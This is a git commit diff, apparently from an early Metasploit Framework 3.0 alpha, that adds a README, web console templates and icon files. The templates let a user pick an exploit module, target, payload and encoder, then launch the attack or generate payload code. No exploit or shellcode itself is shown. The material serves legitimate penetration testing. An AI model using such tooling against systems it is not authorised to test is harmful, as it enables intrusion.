git-svn-id: file:///home/svn/framework3/trunk@3675 4d416f70-5f16-0410-b530-b9f4589650da

README

@@ -0,0 +1,24 @@
+This software is provided under the Metasploit Framework License v1.0
+Please see documentation/LICENSE for the complete terms.
+
+This is an *alpha* release. Many bugs still exist and quite a few features
+are still non-functional. The latest version can be obtained online from:
+ - http://metasploit.com/projects/Framework/msf3/
+
+Licensing information can be found in ./documentation/COPYING
+
+This release has only been tested on the following platforms:
+ - Linux x86 with Ruby 1.8.2-1.8.4
+ - Mac OS X 10.3 with Ruby 1.8.3 from the fink package manager
+ 
+This release *will not* work with the following platforms:
+ - Windows via Cygwin (openssl, readline, other issues)
+ - Windows via Native (stdin reads blocks the whole process)
+ - Mac OS X 10.4 with the standard Ruby install (Apple sucks)
+ 
+Questions and suggestions can be sent to:
+ msfdev[at]metasploit.com
+ 
+The framework-beta mailing list is the place to discuss features and
+ask questions of the user-base. To subscribe, send a blank email to:
+ framework-beta-subscribe[at]metasploit.com

VERSION

@@ -0,0 +1 @@
+3.0 Alpha Release 4

data/msfweb/exploits.rhtml

@@ -0,0 +1,311 @@
+<%= Msf::Ui::Web::Common.header(framework.version, 'exploits') %>
+<tr><td colspan='5'>
+
+<%
+	name   = query_string['name']
+	step   = query_string['step'] || 0
+	target = query_string['target']
+
+	step = step.to_i
+
+	if (name == nil)
+ %>
+
+<%# Display the exploit list if one hasn't been selected %>
+<br/>
+<div align='center' class='navHead'>
+	<table class='moduleList' width='100%' cellspacing='0' border='0'>
+		<% framework.exploits.each_module { |name, mod| 
+			modinst = mod.new
+		 %>
+		<tr>
+			<td class='moduleIcons' align='center'>
+				<%= Msf::Ui::Web::Common.module_icons(modinst) %>
+			</td>
+			<td class='moduleName'>
+				<a href="exploits.rhtml?name=<%= name %>"><%= modinst.name %></a>
+			</td>
+			<td class='moduleSpacer' colspan='2'>
+			</td>
+		</tr>
+		<% } %>
+	</table>
+</div>
+
+<%# Wizard step 0 - target selection %>
+<%
+	elsif (step == 0)
+		modinst = framework.exploits.create(name)
+ %>
+<br/>
+<table width='100%' cellspacing='0' cellpadding='0' border='0'>
+	<tr>
+		<td class='moduleName'>
+			<div class='textBold'><%= html_escape(modinst.name) %></div>
+		</td>
+	</tr>
+</table>
+<br/>
+
+<table align='center' width='95%' cellspacing='0' cellpadding='6' border='0'>
+	<tr>
+		<td align='right' width='80' class='textBold'>Name:</td>
+		<td class='textNormal'><%= html_escape(modinst.name) %></td>
+	</tr>
+	<tr>
+		<td align='right' width='80' class='textBold'>Authors:</td>
+		<td class='textNormal'><%= html_escape(modinst.author.join("<br/>")) %></td>
+	</tr>
+	<tr>
+		<td align='right' width='80' class='textBold' valign='top'>Description:</td>
+		<td colspan='2' class='textNormal' valign='top'>
+			<%= html_escape(modinst.description) %>
+		</td>
+	</tr>
+	<tr>
+		<td align='right' width='80' class='textBold' valign='top'>References:</td>
+		<td colspan='2' class='textNormal' valign='top'>
+			<% modinst.references.each { |ref| %>
+					<% if (ref.kind_of?(Msf::Module::SiteReference)) %>
+					- <a href='<%= ref.site %>' target='_blank'><%= ref.to_s %></a><br/>
+			<% 	else %>
+					- <%= ref.to_s %><br/>
+			<% 	end %>
+			<% } %>
+		</td>
+	</tr>
+	<tr>
+		<td align='right' width='80' class='textBold'>Targets:</td>
+		<td class='textNormal'>&nbsp;</td>
+	</tr>
+	<tr>
+		<td>&nbsp;</td>
+		<td>
+			<table align='align' cellpadding='2' cellspacing='0' border='0'>
+				<tr>
+					<td class='textBold'>Target Name</td>
+					<td class='textBold'>Platform</td>
+				</tr>
+				<% modinst.targets.each_with_index { |tgt, idx| %>
+				<tr>
+					<td class='textBoldColor<%= (idx % 2 == 0) ? "B" : "A" %>' align='left'>
+						<%= idx %> - <a href='exploits.rhtml?name=<%= name %>&step=<%= step + 1 %>&target=<%= idx %>'><%= tgt.name %></a>
+					</td>
+					<td class='textBoldColor<%= (idx % 2 == 0) ? "B" : "A" %>' align='left'>
+						<%= Msf::Ui::Web::Common.target_icons(tgt) %>	
+					</td>
+				</tr>
+				<% } %>
+			</table>
+		</td>
+	</tr>
+</table>
+
+<%# Wizard step 1 - payload selection %>
+<%
+	elsif (step == 1)
+		modinst = framework.exploits.create(name)
+		modinst.datastore['TARGET'] = query_string['target'].to_i
+ %>
+<br/>
+<table width='100%' cellspacing='0' cellpadding='0' border='0'>
+	<tr>
+		<td class='moduleName'>
+			<div class='textBold'><%= html_escape(modinst.name) %></div>
+		</td>
+	</tr>
+</table>
+<br/>
+
+<table align='center' width='95%' cellspacing='0' cellpadding='6' border='0'>
+	<tr>
+		<td align='left' width='80' class='textBold'><nobr>Select Payload:</nobr></td>
+		<td>&nbsp;</td>
+		<td>&nbsp;</td>
+	</tr>
+	<tr>
+		<td>&nbsp;</td>
+		<td class='textBold'>Name</td>
+		<td class='textBold'>Description</td>
+	</tr>
+
+	<% idx = 0
+		modinst.compatible_payloads.each { |pname, pmod| 
+			pmodinst = pmod.new
+	 %>
+		
+	<tr>
+		<td>&nbsp;</td>
+		<td class='textBoldColor<%= (idx % 2 == 0) ? "B" : "A" %>' align='left'>
+			<a href='exploits.rhtml?name=<%= name %>&step=<%= step + 1 %>&target=<%= target %>&payload=<%= pname %>'><%= html_escape(pname) %></a>
+		</td>
+		<td class='textBoldColor<%= (idx % 2 == 0) ? "B" : "A" %>' align='left'><%= html_escape(pmodinst.description) %></td>
+	</tr>
+
+	<% idx += 1
+		}
+	 %>
+
+</table>
+
+<%# Wizard step 2 - option selection %>
+<% elsif (step == 2)
+		payload = query_string['payload']
+		modinst = framework.exploits.create(name)
+		pinst   = framework.payloads.create(payload)
+		modinst.datastore['TARGET'] = query_string['target'].to_i
+ %>
+<br/>
+<table width='100%' cellspacing='0' cellpadding='0' border='0'>
+	<tr>
+		<td class='moduleName'>
+			<div class='textBold'><%= html_escape(modinst.name) %></div>
+		</td>
+	</tr>
+</table>
+<br/>
+
+<form method='GET'>
+	<input type='hidden' name='eid' value="<%= Msf::Ui::Web::Driver::next_eid %>"/>
+	<input type='hidden' name='name' value="<%= html_escape(name) %>"/>
+	<input type='hidden' name='step' value="<%= step + 1 %>"/>
+	<input type='hidden' name='target' value="<%= html_escape(modinst.datastore['TARGET']) %>"/>
+	<input type='hidden' name='payload' value="<%= html_escape(payload) %>"/>
+
+	<table align='center' cellpadding='2' border='0' cellspacing='0' width='95%'>
+	<% 
+		options = pinst.options.merge_sort(modinst.options)
+
+		options.each { |name, option| 
+			next if (option.advanced?)
+			next if (option.evasion?)
+	 %>
+		<tr>
+			<td class='textBold'><%= name %></td>
+			<td class='textBold'><%= (option.required?) ? "Required" : "Optional" %></td>
+			<td class='textNormal'><%= option.type %></td>
+			<td class='textNormal'>
+				<input type='text' name="opt_<%= html_escape(name) %>" value="<%= html_escape(option.default || '') %>"/>
+			</td>
+			<td class='textNormal'><%= html_escape(option.desc) %></td>
+		</tr>
+	<% } %>
+
+		<tr><td colspan='5'>&nbsp;</td></tr>
+
+		<tr>
+			<td colspan='3' class='textBold'>
+				Preferred Encoder:<br/>
+				<select name='encoder' size='1'>
+					<option value='__default'>Default
+				<% pinst.compatible_encoders.each { |encname, mod| %>
+					<option><%= encname %>
+				<% } %>
+				</select>
+			</td>
+			<td colspan='2' class='textBold'>
+				NOP Generator:<br/>
+				<select name='nop' size='1'>
+					<option value='__default'>Default
+				<% pinst.compatible_nops.each { |nopname, mod| %>
+					<option><%= nopname %>
+				<% } %>
+				</select>
+			</td>
+		</tr>
+		
+		<tr><td colspan='5'>&nbsp;</td></tr>
+
+		<noscript>
+			<input type='hidden' name='nojs' value="1"/>
+		</noscript>
+
+		<tr>
+			<td colspan='3' align='right'>
+				<input type='submit' name='action' value='Check' class='button'/>
+			</td>
+			<td colspan='2' align='left'>
+				<input type='submit' name='action' value='Exploit' class='button'/>
+			</td>
+		</tr>
+	</table>
+</form>
+
+<%# Wizard step 3 - exploitation %>
+<%
+	elsif (step == 3)
+
+		# Is JS disabled in the client's browser?
+		nojs = query_string['nojs'] == '1' ? true : false
+
+		# Create the exploit instance
+		modinst = framework.exploits.create(name)
+
+		# Set the encoder/nop to nil if it's not valid.
+		query_string['encoder'] = nil if (query_string['encoder'] == '__default')
+		query_string['nop']     = nil if (query_string['nop'] == '__default')
+
+		# Build the options string
+		options = ''
+
+		query_string.each_pair { |k, v|
+			next if v.nil? or v.length == 0
+
+			if k =~ /^opt_(.*)$/
+				options += "#{$1}=#{v} "
+			end
+		}
+
+		# Use buffered output by default
+		output = Rex::Ui::Text::Output::Buffer.new
+
+		# If we support javascript, then we'll use something better
+		if nojs == false
+			# TODO
+		end
+
+		# Whether or not we should run this as a job
+		as_job = modinst.passive? || (nojs == false)
+
+		# Kick off the exploit process
+		error = false
+
+		begin
+			modinst.exploit_simple(
+				'Encoder'     => query_string['encoder'],
+				'Nop'         => query_string['nop'],
+				'Payload'     => query_string['payload'],
+				'Target'      => query_string['target'].to_i,
+				'OptionStr'   => options,
+				'LocalOutput' => output,
+				'LocalInput'  => nil,
+				'RunAsJob'    => as_job)
+		rescue
+			display = "<span style='font-weight: bold'><span style='color: red'>Error:</span>&nbsp;&nbsp;" + html_escape($!) + "</span>"
+			error   = true
+		end
+
+		# Use the buffered output for display if we didn't fail.
+		if error == false
+			display = html_escape(output.buf).gsub(/\n/, "<br>") 
+
+			if as_job
+				display += "<br/><br/><span style='font-weight: bold'>Exploit is now running in the background.</span>"
+			end
+		end
+%>
+
+<br/>
+<span style='font-weight: bold'>
+Launching exploit <%= modinst.refname %> ...
+</span>
+<br/><br/>
+
+<%= display %>
+
+<% else %>
+	Unknown step: <%= html_escape(step) %>
+<% end %>
+
+</td></tr>
+<%= Msf::Ui::Web::Common.footer %>

data/msfweb/index.rhtml

@@ -0,0 +1,10 @@
+<%= Msf::Ui::Web::Common.header(framework.version) %>
+<tr><td colspan='5'>
+
+<br/>
+<div align='center'>
+	Welcome to the Metasploit Framework.
+</div>
+
+</td></tr>
+<%= Msf::Ui::Web::Common.footer %>

data/msfweb/msfweb_common.rb

@@ -0,0 +1,102 @@
+module Msf
+module Ui
+module Web
+
+###
+#
+# This class implements helper methods for sharing across web pages.
+#
+###
+module Common
+
+	#
+	# Returns the header string that is common to most pages.
+	#
+	def self.header(v, active = "none")
+		"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\" \"http://www.w3.org/TR/html4/loose.dtd\">
+<html>
+	<head>
+		<title>Metasploit Framework Web Console v#{v}</title>
+		<link type='text/css' rel='stylesheet' href='style.css'/>
+	</head>
+	<body>
+		<br/>
+		
+		<div align='center'>
+			<img src='images/logo.jpg' alt='msfweb'/>
+		</div>
+
+		<table align='center' cellpadding='8' border='0' cellspacing='1' width='100%' class='tblInner'>
+			<tr>
+				<td>
+					<table align='center' cellpadding='8' cellspacing='1' width='100%' class='tblOuter'>
+						<tr>
+							<td class='tab" + ((active == "exploits") ? "Light" : "Dark") + "' width='25%' align='center'>
+								<a href='exploits.rhtml'>EXPLOITS</a>
+							</td>
+							<td class='tab" + ((active == "payloads") ? "Light" : "Dark") + "' width='25%' align='center'>
+								<a href='payloads.rhtml'>PAYLOADS</a>
+							</td>
+							<td class='tab" + ((active == "sessions") ? "Light" : "Dark") + "' width='25%' align='center'>
+								<a href='sessions.rhtml'>SESSIONS</a>
+							</td>
+							<td class='tab" + ((active == "jobs") ? "Light" : "Dark") + "' width='25%' align='center'>
+								<a href='jobs.rhtml'>JOBS</a>
+							</td>
+						</tr>
+					</table>
+				</td>
+			</tr>
+		</table>
+		"
+	end
+
+	def self.footer
+		"
+		<br/>
+	</body>
+</html>
+		"
+	end
+
+	#
+	# Returns the HTML for displaying an icon for each platform the supplied
+	# module instance supports.
+	#
+	def self.module_icons(modinst)
+		platform_icons(modinst.platform)
+	end
+
+	def self.target_icons(target)
+		platform_icons(target.platform)
+	end
+
+	def self.platform_icons(platform)
+        # nil?
+        return "" if (platform.nil?)
+		# If this module has no platforms, then we don't show any icons...
+		return "" if (platform.empty?)
+
+		# Otherwise, get the platform specific information...
+		html = ""
+
+		[	
+			[ Msf::Module::Platform::Windows, "win32.gif", "win32"   ],
+			[ Msf::Module::Platform::Linux,   "linux.gif", "linux"   ],
+			[ Msf::Module::Platform::Solaris, "sun.gif",   "solaris" ],
+			[ Msf::Module::Platform::OSX,     "osx.gif",   "osx"     ],
+			[ Msf::Module::Platform::BSD,     "bsd.gif",   "bsd"     ],
+		].each { |plat|
+			if (platform.supports?(Msf::Module::PlatformList.new(plat[0])) == true)
+				html += "<img src='images/#{plat[1]}' class='iconset' border='0' alt='#{plat[2]}'/>"
+			end
+		}
+
+		html
+	end
+
+end
+
+end
+end
+end

data/msfweb/payloads.rhtml

@@ -0,0 +1,216 @@
+<%= Msf::Ui::Web::Common.header(framework.version, 'payloads') %>
+<tr><td colspan='5'>
+
+<%
+	name = query_string['name']
+	step = (query_string['step'] || 0).to_i
+
+	if (name == nil)
+ %>
+
+<%# Display the payload list if one hasn't been selected %>
+<br/>
+<div align='center' class='navHead'>
+	<table class='moduleList' width='100%' cellspacing='0' border='0'>
+		<% framework.payloads.each_module { |name, mod| 
+			modinst = mod.new
+		 %>
+		<tr>
+			<td class='moduleIcons' align='center'>
+				<%= Msf::Ui::Web::Common.module_icons(modinst) %>
+			</td>
+			<td class='moduleName'>
+				<a href="payloads.rhtml?name=<%= name %>"><%= modinst.name %></a>
+			</td>
+			<td class='moduleSpacer' colspan='2'>
+			</td>
+		</tr>
+		<% } %>
+	</table>
+</div>
+
+<%# Wizard step 0 - option selection %>
+<%
+	elsif (step == 0)
+		modinst = framework.payloads.create(name)
+ %>
+<br/>
+<table width='100%' cellspacing='0' cellpadding='0' border='0'>
+	<tr>
+		<td class='moduleIcons' align='center'>
+			<%= Msf::Ui::Web::Common.module_icons(modinst) %>
+		</td>
+		<td class='moduleName'>
+			<div class='textBold'><%= html_escape(modinst.name) %></div>
+		</td>
+	</tr>
+</table>
+<br/>
+
+<table align='center' width='95%' cellspacing='0' cellpadding='6' border='0'>
+	<tr>
+		<td align='right' width='80' class='textBold'>Name:</td>
+		<td class='textNormal'><%= html_escape(modinst.name) %></td>
+	</tr>
+	<tr>
+		<td align='right' width='80' class='textBold'>Version:</td>
+		<td class='textNormal'><%= html_escape(modinst.version) %></td>
+	</tr>
+	<tr>
+		<td align='right' width='80' class='textBold' valign='top'>Authors:</td>
+		<td class='textNormal'><%= modinst.author.map { |x| html_escape(x) }.join("<br/>") %></td>
+	</tr>
+	<tr>
+		<td align='right' width='80' class='textBold' valign='top'>Description:</td>
+		<td colspan='2' class='textNormal' valign='top'>
+			<%= html_escape(modinst.description) %>
+		</td>
+	</tr>
+	<tr>
+		<td align='right' width='80' class='textBold'>Size:</td>
+		<td class='textNormal'><%= modinst.generate.length %></td>
+	</tr>
+	<tr>
+		<td align='right' width='80' class='textBold'>Arch:</td>
+		<td class='textNormal'><%= modinst.arch_to_s %></td>
+	</tr>
+	<tr>
+		<td align='right' width='80' class='textBold'>OS:</td>
+		<td class='textNormal'><%= modinst.platform_to_s %></td>
+	</tr>
+</table>
+
+<br/>
+<br/>
+
+<form method='GET'>
+	<input type='hidden' name='name' value="<%= html_escape(name) %>"/>
+	<input type='hidden' name='step' value="<%= step + 1 %>"/>
+
+	<table align='center' cellpadding='2' border='0' cellspacing='0' width='95%'>
+	<% 
+		modinst.options.each { |name, option| 
+			next if (option.advanced?)
+			next if (option.evasion?)
+	 %>
+		<tr>
+			<td class='textBold'><%= name %></td>
+			<td class='textBold'><%= (option.required?) ? "Required" : "Optional" %></td>
+			<td class='textNormal'><%= option.type %></td>
+			<td class='textNormal'>
+				<input type='text' name="opt_<%= html_escape(name) %>" value="<%= html_escape(option.default || '') %>"/>
+			</td>
+			<td class='textNormal'><%= html_escape(option.desc) %></td>
+		</tr>
+	<% } %>
+
+		<tr><td colspan='5'>&nbsp;</td></tr>
+
+		<tr>
+			<td colspan='5' class='textBold'>
+				Max Size: <input type='text' name='max_size' size='10'/>
+			</td>
+		</tr>
+
+		<tr><td colspan='5'>&nbsp;</td></tr>
+
+		<tr>
+			<td colspan='5' class='textBold'>
+				Restricted Characters (format: 0x00 0x01):<br/>
+				<input type='text' name='badchars' size='45' value='0x00 '/>
+			</td>
+		</tr>
+
+		<tr><td colspan='5'>&nbsp;</td></tr>
+
+		<tr>
+			<td colspan='5' class='textBold'>
+				Selected Encoder:<br/>
+				<select name='encoder' size='1'>
+					<option value='__default'>Default
+				<% modinst.compatible_encoders.each { |encname, mod| %>
+					<option><%= encname %>
+				<% } %>
+				</select>
+			</td>
+		</tr>
+	
+		<tr><td colspan='5'>&nbsp;</td></tr>
+
+		<tr>
+			<td colspan='5' class='textBold'>
+				Format:<br/>
+				<select name='format' size='1'>
+					<option value='c'>C
+					<option value='ruby'>Ruby
+					<option value='perl'>Perl
+					<option value='raw'>Raw
+				</select>
+			</td>
+		</tr>
+	
+		<tr><td colspan='5'>&nbsp;</td></tr>
+
+		<tr>
+			<td colspan='5' align='left'>
+				<input type='submit' name='action' value='Generate Payload' class='button'/>
+			</td>
+		</tr>
+	</table>
+</form>
+
+<%# Wizard step 1 - generation %>
+<%
+	elsif (step == 1)
+		modinst = framework.payloads.create(name)
+
+		badchars = query_string['badchars']
+		encoder  = query_string['encoder']
+		format   = query_string['format']
+		max_size = (query_string['max_size'] || 0).to_i
+
+		# Build the options string
+		options  = ''
+
+		query_string.each_pair { |k, v|
+			next if (v == nil or v.length == 0)
+
+			if (k =~ /^opt_(.*)$/)
+				options += "#{$1}=#{v} "
+			end
+		}
+
+		begin
+			generation = modinst.generate_simple(	
+				'Encoder'   => (encoder == '__default') ? nil : encoder,
+				'BadChars'  => badchars,
+				'Format'    => format || 'c',
+				'OptionStr' => options,
+				'MaxSize'   => (max_size == 0) ? nil : max_size)
+		rescue 
+			generation = $!
+		end
+ %>
+<br/>
+<table width='100%' cellspacing='0' cellpadding='0' border='0'>
+	<tr>
+		<td class='moduleIcons' align='center'>
+			<%= Msf::Ui::Web::Common.module_icons(modinst) %>
+		</td>
+		<td class='moduleName'>
+			<div class='textBold'><%= html_escape(modinst.name) %></div>
+		</td>
+	</tr>
+</table>
+<br/>
+
+<pre>
+<%= generation %>
+</pre>
+
+<% else %>
+	Unknown step: <%= html_escape(step) %>
+<% end %>
+
+</td></tr>
+<%= Msf::Ui::Web::Common.footer %>

data/msfweb/style.css

@@ -0,0 +1,243 @@
+html {
+	margin: 0px;
+	padding: 0px;
+}
+
+body
+{
+    background:     white;
+    font-family:    Verdana, Tahoma, Arial, Helvetica, sans-serif;
+    color:          black;
+    font-size:      10pt;
+	margin:			0.1cm 0.5cm 0.1cm 0.5cm;
+}
+
+A { 
+	font-size: 			10pt;
+	text-decoration: 	none; 
+	color: 				navy; 
+	font-weight: 		bold;
+}
+
+
+A:hover { 
+	text-decoration: underline;
+}
+
+.tabDark {
+	background:		#dddddd;
+}
+A.tabDark {
+
+}
+
+.tabLight {
+	background:		#eeeeee;
+}
+A.tabLight {
+
+}
+
+.tabActive {
+
+}
+A.tabActive {
+	text-decoration: underline;
+}
+
+
+.sectionTitle {
+	color:			black;
+	font-size:		10pt;
+	font-weight:	bold;
+}
+
+.listBody {
+	background:		white;
+	color:			black;
+	font-size:		10pt;
+}
+
+A.nav {
+	font-size:		10pt;
+	font-weight:	bold;
+}
+
+.nav { 
+	font-size:		10pt;
+	font-weight:	normal;
+	font-weight:	bold;
+}
+
+.navHead { 
+	font-size:		10pt;
+	font-weight:	bold;
+}
+
+.copy {
+	font-size:		10pt;
+	font-variant:	small-caps;
+}
+
+.modHead {
+	font-size:		10pt;
+	font-weight:	bold;
+	color:			white;
+}
+
+.shellcode {
+	font-size:		10pt;
+	font-weight:	normal;
+	color:			black;
+}
+
+.boldText { 
+	font-size: 		10pt; 
+	color: 			black; 
+	font-weight: 	bold;
+}
+
+.moduleOutput {
+	font-size:		10pt;
+	color:			black;
+}
+
+.moduleInfo {
+	font-size:		10pt;
+	color:			black;
+}
+
+.textNormal {
+	font-size:		10pt;
+	color:			black;
+}
+
+.textBold {
+	font-size:		10pt;
+	color:			black;
+	font-weight: 	bold;
+}
+
+.textBoldDark {
+	font-size:		10pt;
+	color:			grey;
+	font-weight: 	bold;
+}
+
+.textBoldBright {
+	font-size:		10pt;
+	color:			black;
+	font-weight: 	bold;
+}
+
+
+.textNormalColorA {
+	background:		#eeeeee;
+	font-size:		10pt;
+	font-weight:	normal;
+}
+
+.textBoldColorA {
+	background:		#eeeeee;
+	font-size:		10pt;
+	font-weight:	bold;
+}
+
+
+.textNormalColorB {
+	background:		#dddddd;
+	font-size:		10pt;
+	font-weight:	normal;
+}
+
+.textBoldColorB {
+	background:		#dddddd;
+	font-size:		10pt;
+	font-weight:	bold;
+}
+
+.tblOuter {
+	background:		black;
+}
+
+.tblInner {
+	background:		white;
+}
+
+
+select {
+	color:			black;
+	background:		#eeeeee;
+	font-weight:	bold;
+	padding: 		2px 2px 2px 2px;	
+}
+
+input {
+	font-weight:	bold;
+	color:			black;
+	background:		#eeeeee;
+	color:			black;
+	padding: 		2px 10px 2px 10px;
+	border: 		1px solid grey;
+}
+
+input.button {
+	border-left: 		1px solid grey;
+	border-top: 		1px solid grey;
+	border-bottom: 		2px solid black;
+	border-right: 		2px solid black;		
+	padding: 			1px 5px 1px 5px;
+}
+
+.iconset 
+{
+	background: white;
+	padding: 2px 2px 2px 2px;
+	border: 1px solid white;
+}
+
+.moduleList
+{
+	white-space: nowrap;
+}
+
+.moduleIcons
+{
+	border-top: 1px solid #aaaaaa;
+	border-left: 1em solid #aaaaaa;
+	padding: 0.5em 0em 0em 0.25em;
+}
+		
+.moduleName
+{
+	border-top: 1px solid #aaaaaa;
+	padding: 0.5em 0.5em 0em 0em;
+}
+
+.moduleSpacer 
+{
+	padding: 10px 0px 0px 0px;
+	margin: 0;
+}
+
+.CommandBar {
+
+}
+
+#CommandBarList {
+	padding: 		0 1px 1px;
+	margin-left: 	0;
+}
+
+#CommandBarList li {
+	list-style: 	none;
+	margin: 		0;
+	display: 		inline;
+}
+
+#CommandBarList li a {
+}
+
+#CommandBarList li a:hover {
+	border-bottom: 	1px solid #black;
+}

data/msfwx/encoders.xpm

@@ -0,0 +1,26 @@
+/* XPM */
+static char * encoders_xpm[] = {
+"16 16 7 1",
+" 	c None",
+".	c #000000",
+"+	c #A0A0A4",
+"@	c #C0C0C0",
+"#	c #808080",
+"$	c #585858",
+"%	c #303030",
+"                ",
+"                ",
+"                ",
+"      ...       ",
+"    ..+++..     ",
+"  ..+++@+++..   ",
+"..+++@+++++++.. ",
+".#+++++++++++$. ",
+".###+++++++$$$. ",
+"..####+++$$$$.. ",
+"% ..####$$$.. % ",
+"  % ..##$.. %   ",
+"    % ... %     ",
+"      % %       ",
+"                ",
+"                "};

data/msfwx/mod_exploit.xpm

@@ -0,0 +1,105 @@
+/* XPM */
+static char * mod_exploit_xpm[] = {
+"16 15 87 1",
+" 	c None",
+".	c #F21B00",
+"+	c #EF1B00",
+"@	c #F22407",
+"#	c #ED2307",
+"$	c #F74626",
+"%	c #F34E31",
+"&	c #E41800",
+"*	c #EF1E02",
+"=	c #FD7854",
+"-	c #E21B02",
+";	c #F23B1D",
+">	c #FE6437",
+",	c #EA3C22",
+"'	c #E42D15",
+")	c #FE1F00",
+"!	c #FB1E00",
+"~	c #F81D00",
+"{	c #F52406",
+"]	c #F33215",
+"^	c #F03115",
+"/	c #FB714E",
+"(	c #FA7655",
+"_	c #E12D15",
+":	c #DE2C15",
+"<	c #D51B06",
+"[	c #D5230E",
+"}	c #C61100",
+"|	c #C31000",
+"1	c #FD1F00",
+"2	c #FB4527",
+"3	c #FE7F5F",
+"4	c #FE734D",
+"5	c #FE5E32",
+"6	c #FE6E46",
+"7	c #FB6A49",
+"8	c #D92812",
+"9	c #C20F00",
+"0	c #F52203",
+"a	c #FD5932",
+"b	c #FE5228",
+"c	c #FE5229",
+"d	c #FB4C29",
+"e	c #CF1703",
+"f	c #EF2508",
+"g	c #FA3C16",
+"h	c #FE471E",
+"i	c #FE4720",
+"j	c #F33C1C",
+"k	c #D11602",
+"l	c #EA1E02",
+"m	c #FE3D15",
+"n	c #FE3D17",
+"o	c #D51803",
+"p	c #F0573E",
+"q	c #EF2103",
+"r	c #FE340E",
+"s	c #FE330E",
+"t	c #DC1B04",
+"u	c #EA3A20",
+"v	c #F32203",
+"w	c #FE2C08",
+"x	c #FE2909",
+"y	c #F82508",
+"z	c #F82607",
+"A	c #FE2B08",
+"B	c #E71C04",
+"C	c #BF0F00",
+"D	c #E72E15",
+"E	c #FA2102",
+"F	c #FB1F03",
+"G	c #E21801",
+"H	c #CF1300",
+"I	c #CB1100",
+"J	c #DB1601",
+"K	c #FB2203",
+"L	c #F71F03",
+"M	c #BC0E00",
+"N	c #E11902",
+"O	c #EA1700",
+"P	c #D61400",
+"Q	c #C51000",
+"R	c #DC1400",
+"S	c #BE0E00",
+"T	c #D91500",
+"U	c #BB0D00",
+"V	c #B70D00",
+"       .+       ",
+"       @#       ",
+"      +$%&      ",
+"      *==-      ",
+"      ;>>,'     ",
+")!~{]^/>>(_:<[}|",
+"1234455555564789",
+"  0abbbbbbbcde  ",
+"   fghhhhhijk   ",
+"    lmmmmmno    ",
+"   pqrrsrrst    ",
+"   uvwxyzAwBC   ",
+"   DEFGHIJKLM   ",
+"   NOP    QRS   ",
+"   TP      UV   "};

data/msfwx/mod_payload.xpm

@@ -0,0 +1,108 @@
+/* XPM */
+static char * mod_exploit_xpm[] = {
+"16 15 90 1",
+" 	c None",
+".	c #F27A00",
+"+	c #EF7700",
+"@	c #F28807",
+"#	c #ED8307",
+"$	c #EF7800",
+"%	c #F7B526",
+"&	c #F3B131",
+"*	c #E46B00",
+"=	c #EF7E02",
+"-	c #FDF554",
+";	c #FDF354",
+">	c #E27002",
+",	c #F2A31D",
+"'	c #FEFE37",
+")	c #EA9722",
+"!	c #E48215",
+"~	c #FE8A00",
+"{	c #FB8800",
+"]	c #F88300",
+"^	c #F58C06",
+"/	c #F39715",
+"(	c #F09215",
+"_	c #FBEA4E",
+":	c #FAE755",
+"<	c #E17F15",
+"[	c #DE7C15",
+"}	c #D56406",
+"|	c #D56B0E",
+"1	c #C64A00",
+"2	c #C34600",
+"3	c #FD8900",
+"4	c #FBAE27",
+"5	c #FEF05F",
+"6	c #FEF74D",
+"7	c #FEF732",
+"8	c #FEF746",
+"9	c #FBDC49",
+"0	c #D97612",
+"a	c #C24400",
+"b	c #F58E03",
+"c	c #FDE232",
+"d	c #FEE528",
+"e	c #FEE129",
+"f	c #FBC629",
+"g	c #CF5C03",
+"h	c #EF8808",
+"i	c #FAC216",
+"j	c #FED61E",
+"k	c #FECF20",
+"l	c #F3A91C",
+"m	c #D15C02",
+"n	c #EA7F02",
+"o	c #FEC615",
+"p	c #FEBF17",
+"q	c #D56103",
+"r	c #F0AE3E",
+"s	c #EF8803",
+"t	c #FEB70E",
+"u	c #FEB50E",
+"v	c #FEB40E",
+"w	c #DC6A04",
+"x	c #EA9320",
+"y	c #F38D03",
+"z	c #FEA708",
+"A	c #FE9709",
+"B	c #F88808",
+"C	c #F89307",
+"D	c #FEA608",
+"E	c #E77104",
+"F	c #BF4200",
+"G	c #E78515",
+"H	c #FA8E02",
+"I	c #FB8203",
+"J	c #E26601",
+"K	c #CF5300",
+"L	c #CB4E00",
+"M	c #DB6001",
+"N	c #FB8C03",
+"O	c #F77E03",
+"P	c #BC3E00",
+"Q	c #E16A02",
+"R	c #EA6900",
+"S	c #D65A00",
+"T	c #C54600",
+"U	c #DC5900",
+"V	c #BE3E00",
+"W	c #D95F00",
+"X	c #BB3C00",
+"Y	c #B73800",
+"       .+       ",
+"       @#       ",
+"      $%&*      ",
+"      =-;>      ",
+"      ,'')!     ",
+"~{]^/(_'':<[}|12",
+"345667777778690a",
+"  bcdddddddefg  ",
+"   hijjjjjklm   ",
+"    nooooopq    ",
+"   rsttuttvw    ",
+"   xyzABCDzEF   ",
+"   GHIJKLMNOP   ",
+"   QRS    TUV   ",
+"   WS      XY   "};

data/msfwx/msfwx.xpm

@@ -0,0 +1,37 @@
+/* XPM */
+static char * msf_xpm[] = {
+"32 32 2 1",
+" 	c None",
+".	c #000000",
+"                                ",
+"                                ",
+"                                ",
+"                                ",
+"                                ",
+"                                ",
+"             ....    ....       ",
+"             ....   ....        ",
+"            .....   ....        ",
+"            ....   .....        ",
+"            ....   ....         ",
+"        ...................     ",
+"       ...................      ",
+"       ...................      ",
+"       ..................       ",
+"          ....   ....           ",
+"          ....   ....           ",
+"         ....    ....           ",
+"     ...................        ",
+"     ...................        ",
+"     ..................         ",
+"     ..................         ",
+"       .....   ....             ",
+"       ....   .....             ",
+"       ....   ....              ",
+"      ....    ....              ",
+"      ....   ....               ",
+"                                ",
+"                                ",
+"                                ",
+"                                ",
+"                                "};

data/msfwx/nops.xpm

@@ -0,0 +1,26 @@
+/* XPM */
+static char * encoders_xpm[] = {
+"16 16 7 1",
+" 	c None",
+".	c #000000",
+"+	c #A0A0A4",
+"@	c #C0C0C0",
+"#	c #808080",
+"$	c #585858",
+"%	c #303030",
+"                ",
+"                ",
+"                ",
+"      ...       ",
+"    ..+++..     ",
+"  ..+++@+++..   ",
+"..+++@+++++++.. ",
+".#+++++++++++$. ",
+".###+++++++$$$. ",
+"..####+++$$$$.. ",
+"% ..####$$$.. % ",
+"  % ..##$.. %   ",
+"    % ... %     ",
+"      % %       ",
+"                ",
+"                "};

data/msfwx/payloads.xpm

@@ -0,0 +1,26 @@
+/* XPM */
+static char * encoders_xpm[] = {
+"16 16 7 1",
+" 	c None",
+".	c #000000",
+"+	c #A0A0A4",
